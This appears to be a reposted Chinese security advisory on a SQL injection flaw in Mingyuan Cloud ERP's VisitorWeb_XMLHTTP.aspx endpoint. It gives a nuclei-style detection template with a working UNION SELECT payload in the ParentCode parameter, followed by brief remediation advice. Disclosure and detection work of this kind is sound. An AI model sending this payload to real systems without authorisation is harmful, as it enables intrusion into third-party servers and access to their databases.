2、部分界面如下
3、隐患url,验证如下
id: mingyuanyun-erp-VisitorWeb-sql
info:
name: mingyuanyun-erp-VisitorWeb-sql
description: 明mingyuanyun-erp-VisitorWeb-sql
author: xxx
severity: high
http:
- raw:
- |
GET /CgZtbWeb/VisitorWeb/VisitorWeb_XMLHTTP.aspx?ywtype=GetParentProjectName&ParentCode=1'+union+select+sum(255*255)--+z HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
matchers:
- type: dsl
dsl:
- "status_code == 200 && contains(body,'65025')"
修复建议
1、请联系厂商进行修复。 2、如非必要,禁止公网访问该系统。 3、设置白名单访问。
原文始发于微信公众号(骇客安全):明源云erpVisitorWeb_XMLHTTP.aspx存在SQL注入
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论